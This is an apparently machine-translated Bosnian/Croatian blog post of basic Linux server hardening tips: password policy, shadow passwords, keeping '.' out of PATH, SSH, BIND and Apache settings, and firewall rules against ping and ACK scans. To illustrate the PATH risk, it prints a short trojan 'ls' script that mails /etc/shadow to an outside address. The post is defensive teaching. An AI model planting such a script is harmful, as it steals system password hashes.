Već dugo nisam ništa objavio na blogu i volio bih podijeliti s vama nekoliko savjeta preuzetih iz knjige koja (između ostalih). Pronašao sam ga na univerzitetu i upravo sam pročitao i premda je iskreno pomalo zastario i vrlo je vjerojatno da će prikazane tehnike raditi s obzirom na evoluciju sistema, to su i zanimljivi aspekti koji se mogu pokazati.
Želim pojasniti da su to savjeti orijentirani na Linux sistem koji se koristi kao server, u srednjem ili možda velikom obimu, jer na nivou korisnika radne površine, iako se mogu primijeniti, ne bi bili od velike koristi.
Također napominjem da su to jednostavni brzi savjeti i neću ulaziti u detalje, iako planiram napraviti još jedan puno konkretniji i opširniji post o određenoj temi. Ali to ću vidjeti kasnije. Hajde da počnemo.
Politike lozinke.
Iako zvuči kao krilatica, dobra politika lozinke čini razliku između ranjivog sistema ili ne. Napadi poput "grube sile" koriste lošu lozinku za pristup sistemu. Najčešći savjeti su:
- Kombinirajte velika i mala slova.
- Koristite posebne znakove.
- Brojevi.
- Više od 6 znamenki (nadamo se i više od 8).
Uz ovo, razmotrimo dvije bitne datoteke. / etc / passwd i / etc / shadow.
Nešto vrlo važno je datoteka / etc / passwd. Osim što nam daje ime korisnika, njegov uid, putanju do mape, bash .. itd. u nekim slučajevima prikazuje i šifrirani ključ korisnika.
Pogledajmo njegov tipični sastav.
desdelinux:FXWUuZ.vwXttg:500:501::/home/usuario1:/bin/bash
korisnik: cryptkey: uid: gid: put :: put: bash
Pravi problem ovdje je taj što ova datoteka ima dozvole -rw-r - r– što znači da ima dozvole za čitanje za bilo kojeg korisnika na sistemu. a posjedovanje šifriranog ključa nije jako teško dešifrirati pravi.
Zbog toga datoteka postoji / etc / shadow. Ovo je datoteka u kojoj su, između ostalog, pohranjeni svi korisnički ključevi. Ova datoteka ima potrebne dozvole tako da je nijedan korisnik ne može pročitati.
Da bismo to onda popravili, moramo otići do datoteke / etc / passwd i promijenite šifrirani ključ u "x", ovo će samo sačuvati ključ u našoj datoteci / etc / shadow.
desdelinux:x:500:501::/home/usuario1:/bin/bash
Problemi s PATH-om i .bashrc-om i drugima.
Kada korisnik izvrši naredbu na svojoj konzoli, ljuska traži tu naredbu na popisu direktorija sadržanih u varijabli okruženja PATH.
Ako u konzolu upišete "echo $ PATH", to će otvoriti nešto poput ovoga.
.:/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games:/home/carlos/bin
U svakoj od tih mapa ljuska će tražiti naredbu napisanu za njeno izvršavanje. "." to znači da je prva mapa koju treba potražiti ista mapa iz koje se izvršava naredba.
Pretpostavimo da postoji korisnik "Carlos" i da taj korisnik želi "činiti zlo". Ovaj korisnik može ostaviti datoteku zvanu "ls" u svojoj glavnoj mapi i u ovoj datoteci izvršiti naredbu poput:
#!/bin/bash
cat /etc/shadow | mail hacker@mail.com
/bin/ls
A ako korijenski korisnik za odredišne stvari pokuša navesti mape unutar mape carlos (jer prvo traži naredbu u toj istoj mapi, nehotice bi datoteku s lozinkama poslao na ovu e-poštu, a zatim mape bi bio na popisu i saznao bi to vrlo kasno.
Da bismo to izbjegli moramo ukloniti "." varijable PATH.
Na isti način, datoteke kao što su /.bashrc, /.bashrc_profile, ./.login treba revidirati i provjeriti da ne postoji "." u varijabli PATH, a zapravo iz datoteka poput ove možete promijeniti odredište određene naredbe.
Savjeti za usluge:
SHH
- Onemogućite verziju 1 ssh protokola u datoteci sshd_config.
- Ne dozvoli root korisniku da se prijavi ssh-om.
- Datoteke i mape ssh_host_key, ssh_host_dsa_key i ssh_host_rsa_key treba čitati samo root korisnik.
BIND
- Promijenite poruku dobrodošlice u datoteci named.conf tako da ne prikazuje broj verzije
- Transferi s ograničenom zonom i omogućite ih samo timovima kojima je potreban.
apaš
- Sprečite uslugu da prikazuje vašu verziju u poruci dobrodošlice. Uredite datoteku httpd.conf i dodajte ili izmijenite redove:
ServerSignature Off
ServerTokens Prod
- Onemogući automatsko indeksiranje
- Konfigurirajte apache da ne poslužuje osjetljive datoteke poput .htacces, * .inc, * .jsp .. itd
- Uklonite stranice sa stranicama ili uzorak iz usluge
- Pokrenite apache u chrootiranom okruženju
Mrežna sigurnost.
Bitno je pokriti sve moguće unose u vaš sistem s vanjske mreže, evo nekoliko osnovnih savjeta kako spriječiti uljeze da skeniraju i dobiju informacije s vaše mreže.
Blokirajte ICMP promet
Vatrozid mora biti konfiguriran da blokira sav dolazni i odlazni ICMP promet i eho odgovore. Ovim izbjegavate da vas, na primjer, locira skener koji traži opremu pod naponom u rasponu IP-a.
Izbjegavajte TCP skeniranje pinga.
Jedan od načina skeniranja vašeg sistema je TCP ping skeniranje. Pretpostavimo da se na vašem serveru nalazi Apache server na portu 80. Uljez bi mogao poslati ACK zahtjev na taj port, čime će, ako sistem odgovori, računar biti živ i skenirat će ostale portove.
Zbog toga bi vaš vatrozid uvijek trebao imati opciju "svijest o stanju" i odbaciti sve ACK pakete koji ne odgovaraju već uspostavljenoj TCP vezi ili sesiji.
Nekoliko dodatnih savjeta:
- Koristite IDS sisteme za otkrivanje skeniranja porta na vašoj mreži.
- Konfigurirajte zaštitni zid tako da ne vjeruje postavkama priključka izvora veze.
To je zato što neka skeniranja koriste "lažni" izvorni port poput 20 ili 53, budući da mnogi sistemi vjeruju tim portovima jer su tipični za ftp ili DNS.
NOTA: Imajte na umu da je većina problema naznačenih u ovom postu već riješena u gotovo svim trenutnim distribucijama. Ali nikada ne škodi imati ključne informacije o tim problemima kako se oni ne bi desili vama.
NOTA: Kasnije ću vidjeti određenu temu i objavit ću post s puno detaljnijim i aktualnijim informacijama.
Zahvaljujem svima na čitanju.
Pozdrav.
Članak mi se jako svidio i zanima me tema, potičem vas da nastavite učitavati sadržaj.